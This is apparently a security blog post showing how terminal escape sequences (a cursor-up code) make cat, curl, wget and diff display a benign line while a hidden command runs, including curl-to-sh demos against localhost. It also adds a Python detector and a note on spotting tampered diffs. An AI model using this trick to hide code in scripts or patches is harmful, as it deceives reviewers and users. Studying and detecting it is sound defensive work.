How it technically works

A terminal escape sequence is a special sequence of characters that is printed (like any other text).

If the terminal understands the sequence, it does not display the character sequence; it performs the action the sequence encodes instead.

$ printf '#!/bin/bash
echo doing something evil!
exit
\033[2Aecho doing something very nice!
' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!

As you can see, our beloved ‘cat’ cheated on us.

Instead of displaying the character sequence, the escape sequence \033[XA (where X is a count) performed an action.

That action moves the cursor up X lines, so whatever is printed next overwrites the line X rows above it.

But this doesn’t affect only cat; it affects every tool whose output is shown by a terminal that interprets escape sequences.

$ head backdoor.sh
#!/bin/bash
echo doing something very nice!
$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!
$ more backdoor.sh
#!/bin/bash
echo doing something very nice!
$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!
$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!

But if we pipe it into a shell:

$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!
$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!
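Before a fetched script goes anywhere near a shell, the bytes themselves can be checked for terminal control sequences instead of trusting what cat or curl appear to show. The Python below is an added example, not code from the original post; the sample bytes are constructed from the printf above, and the caret rendering follows the cat -v convention.

```python
import re

# Constructed sample: the exact bytes the printf in the post writes to backdoor.sh
BACKDOOR_SH = (b"#!/bin/bash\n"
               b"echo doing something evil!\n"
               b"exit\n"
               b"\033[2Aecho doing something very nice!\n")
# Constructed clean counterpart: what the terminal made backdoor.sh look like
LEGIT_SH = b"#!/bin/bash\necho doing something very nice!\n"

# ECMA-48 control sequences plus stray C0 controls; tab and newline are allowed.
CONTROL_RE = re.compile(
    rb"\x1b\[[0-?]*[ -/]*[@-~]"             # CSI, e.g. ESC [ 2 A  (cursor up 2)
    rb"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"  # OSC (title, hyperlink), BEL/ST terminated
    rb"|\x1b[\x40-\x5f]"                    # other two-byte ESC sequences
    rb"|\x9b"                               # 8-bit CSI
    rb"|[\x00-\x08\x0b-\x1f\x7f]"           # remaining C0 controls (CR, BS, ...) and DEL
)

def find_controls(data):
    """Return (line, column, raw_bytes) for every control sequence in data."""
    hits = []
    for m in CONTROL_RE.finditer(data):
        line = data.count(b"\n", 0, m.start()) + 1
        col = m.start() - (data.rfind(b"\n", 0, m.start()) + 1)
        hits.append((line, col, m.group()))
    return hits

def is_clean(data):
    """True when the bytes contain nothing a terminal would interpret."""
    return not find_controls(data)

def _caret(b):
    # caret notation for a single 7-bit byte
    if b < 32:
        return "^" + chr(b + 64)
    return "^?" if b == 127 else chr(b)

def show_controls(data):
    """Render bytes the way cat -v does (ESC -> ^[, 0x8a -> M-^J) so the real
    content is visible and no control byte reaches the terminal unescaped."""
    out = []
    for b in data:
        if b in (9, 10):            # keep tab and newline as they are
            out.append(chr(b))
        elif b < 128:
            out.append(_caret(b))
        else:
            out.append("M-" + _caret(b - 128))
    return "".join(out)
```

Run is_clean over the downloaded bytes before deciding to execute them; show_controls gives the same view cat -v would, with the hidden line visible as ^[[2A.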

diff output is affected as well, and so are the resulting patches:

$ cat backdoor.sh  #evil file
#!/bin/bash
echo doing something very nice!
$ cat legit.sh  #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!
$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh	2015-09-17 16:25:42.985349535 +0100
+++ legit.sh	2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
 #!/bin/bash
-echo doing something very nice!
+echo doing something very nice!
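Review bot: the hunk header "@@ -1,4 +1,2 @@" declares four old lines and two new lines, yet only three hunk lines are visible (one context line, one removal, one addition); a unified hunk can never be shorter than its header claims, so this mismatch is the observable sign that the terminal rendering has been tampered with, and a patch showing it should be inspected with something that does not interpret escape sequences (for example "cat -v") before it is read or applied.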

Reference

http://www.openwall.com/lists/oss-security/2015/09/17/5
http://www.openwall.com/lists/oss-security/2015/08/11/8
http://turbochaos.blogspot.ca/2014/08/journalctl-terminal-escape-injection.html
